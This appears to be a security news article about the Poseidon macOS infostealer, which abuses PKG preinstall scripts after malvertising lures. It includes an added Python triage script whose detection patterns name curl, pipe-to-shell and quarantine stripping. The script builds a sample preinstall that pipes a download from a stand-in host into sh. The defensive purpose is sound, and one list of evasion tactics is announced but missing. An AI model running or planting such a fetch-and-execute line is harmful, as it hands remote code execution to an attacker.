A recent discovery by cybersecurity researchers has revealed that the Poseidon malware, a macOS-targeting trojan, is leveraging PKG files with preinstall scripts to infiltrate systems.
This malware, only 207 bytes in size, is currently undetected on VirusTotal and poses a significant threat to Mac users.
The preinstall script embedded in the PKG file serves as a delivery mechanism, allowing the malware to download and execute malicious payloads on unsuspecting victims’ devices.
Poseidon is part of the growing Malware-as-a-Service (MaaS) ecosystem and has been active since mid-2024.
It is designed to steal sensitive user data, including browser credentials, cryptocurrency wallet information, and system files.
The malware employs sophisticated techniques such as anti-debugging measures and custom encoding algorithms to evade detection and complicate analysis.
Poseidon’s infection process often begins with malvertising campaigns.
Users are redirected to fake websites mimicking legitimate platforms, such as the DeepSeek or Arc browser sites.
These websites trick users into downloading malicious DMG or PKG files disguised as legitimate applications.
Once downloaded, the malware exploits macOS Gatekeeper bypass techniques by directing users to execute scripts via Terminal.
This method allows Poseidon to circumvent macOS security features and gain unauthorized access to the system.
The preinstall script within the PKG file is particularly concerning.
It executes commands during installation to download additional payloads or directly install the malware.
Once active, Poseidon exfiltrates data from specific directories (e.g., Desktop, Downloads) and targets file types like “txt,” “pdf,” “docx,” and cryptocurrency-related extensions.
It also gathers system information, accesses Keychain data, and attempts to retrieve Chrome Safe Storage keys without user consent.
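As an added triage example (not from the article or any vendor's tooling), the Python below inspects a package that has already been expanded with `pkgutil --expand-full` and flags the download-and-execute behaviour described above in its preinstall/postinstall scripts; the indicator list, script names and the sample package it builds are constructed assumptions.

```python
import os
import re
import tempfile

# Constructed list of patterns a defender would flag in an installer script.
INDICATORS = {
    "downloads_from_network": re.compile(r"\b(curl|wget)\b"),
    "pipes_download_to_shell": re.compile(r"\|\s*(sh|bash|zsh)\b"),
    "decodes_base64": re.compile(r"base64\s+(-d|-D|--decode)"),
    "runs_applescript": re.compile(r"\bosascript\b"),
    "strips_quarantine_flag": re.compile(r"xattr\b.*com\.apple\.quarantine"),
}
# Script names Installer runs automatically; preinstall is the one Poseidon abuses.
SCRIPT_NAMES = ("preinstall", "postinstall", "preflight", "postflight")

def triage_script(path):
    """Return the sorted indicator names matched by one install script."""
    with open(path, "r", errors="replace") as fh:
        body = fh.read()
    return sorted(name for name, rx in INDICATORS.items() if rx.search(body))

def triage_package(expanded_dir):
    """Map every install script under an expanded .pkg tree to its indicator hits.

    Each component package inside a distribution package has its own Scripts
    directory, so the whole tree is walked rather than only the top level.
    """
    findings = {}
    for root, _dirs, files in os.walk(expanded_dir):
        if os.path.basename(root) != "Scripts":
            continue
        for name in files:
            if name in SCRIPT_NAMES:
                full = os.path.join(root, name)
                findings[os.path.relpath(full, expanded_dir)] = triage_script(full)
    return findings

def build_sample_package():
    """Create a constructed expanded-package tree with a stager-style preinstall."""
    base = tempfile.mkdtemp(prefix="pkg_triage_")
    scripts = os.path.join(base, "app.pkg", "Scripts")
    os.makedirs(scripts)
    with open(os.path.join(scripts, "preinstall"), "w") as fh:  # constructed sample
        fh.write("#!/bin/sh\ncurl -s http://example.invalid/p | sh\nexit 0\n")
    with open(os.path.join(scripts, "postinstall"), "w") as fh:  # benign sample
        fh.write("#!/bin/sh\n/usr/bin/touch /tmp/installed\nexit 0\n")
    return base

if __name__ == "__main__":
    for script, hits in triage_package(build_sample_package()).items():
        print(script, "->", hits or "clean")
```

A real package is expanded first with `pkgutil --expand-full Installer.pkg /tmp/expanded` on a Mac and `triage_package("/tmp/expanded")` is run on the result; a clean package yields an empty list for every script.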
Poseidon employs several advanced evasion tactics to remain undetected:
These techniques make it challenging for researchers and antivirus software to analyze or intercept its operations effectively.
According to the report, Poseidon has emerged as one of the most active macOS infostealers, accounting for 70% of detections in late 2024.
Its ability to bypass traditional security measures highlights the evolving sophistication of macOS-targeted malware.
Users are advised to exercise caution when downloading software from unfamiliar sources and avoid executing scripts in Terminal unless absolutely necessary.
To mitigate risks, users should implement robust endpoint protection solutions, maintain regular software updates, and use tools like Malwarebytes for Mac to detect and remove threats like Poseidon.